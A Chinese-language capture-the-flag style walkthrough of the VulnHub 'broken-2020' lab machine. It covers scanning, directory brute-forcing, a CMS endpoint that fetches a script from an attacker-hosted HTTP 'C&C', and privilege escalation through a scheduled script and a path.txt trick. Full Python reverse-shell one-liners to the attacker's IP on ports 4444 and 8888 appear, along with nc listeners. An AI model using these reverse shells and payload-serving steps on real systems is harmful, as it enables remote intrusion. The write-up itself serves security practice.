今天实践的是vulnhub的broken-2020镜像,
下载地址,https://download.vulnhub.com/broken-2020/broken-2020.ova,
先是用workstation导入,做地址扫描没扫到地址,
于是又用virtualbox导入,重新做地址扫描,
sudo netdiscover -r 192.168.0.0/24,这回有地址了,189就是,
再继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.189,
有web服务,做一下目录暴破,dirb http://192.168.0.189,
浏览器访问http://192.168.0.189/cms,顺手点击了install,
再重新做目录暴破,dirb http://192.168.0.189/cms,
浏览器访问http://192.168.0.189/cms/cc,
kali攻击机上开个http下载做为C&C,python2 -m SimpleHTTPServer,
连接后发现kali攻击机被请求了一个脚本文件,
198b7cafcd30d3e05acf2cdd82822c95.sh,
那就造一个,里面放上反弹shell命令,同时再开个监听,nc -lvp 4444,
vim 198b7cafcd30d3e05acf2cdd82822c95.sh,
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.192",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
再次连接,稍等一会儿,反弹shell就过来了,不是root,需要提权,
改成交互式shell,python -c "import pty;pty.spawn('/bin/bash')",
发现了alice用户,且有个脚本能定时被以alice用户执行,
在kali攻击机上构造这个脚本,vim log.py,同样里面放上反弹shell命令,
#!/usr/bin/python2.7
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.192",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
把log.py下载到靶机,
kali攻击机这边再开个新的反弹shell监听,nc -lvp 8888,
很快反弹shell就过来了,仍然需要继续提权,
继续转成交互式shell,python -c "import pty;pty.spawn('/bin/bash')",
发现有脚本能够把path.txt里目录的访问权限搞到alice用户下,
那就把root目录进去,echo "/root" > path.txt,
等一会儿再看就有root目录了,
这个靶机最后没拿到root的shell,仅完成了获取root目录的访问权限。
如有侵权请联系:admin#unsafe.sh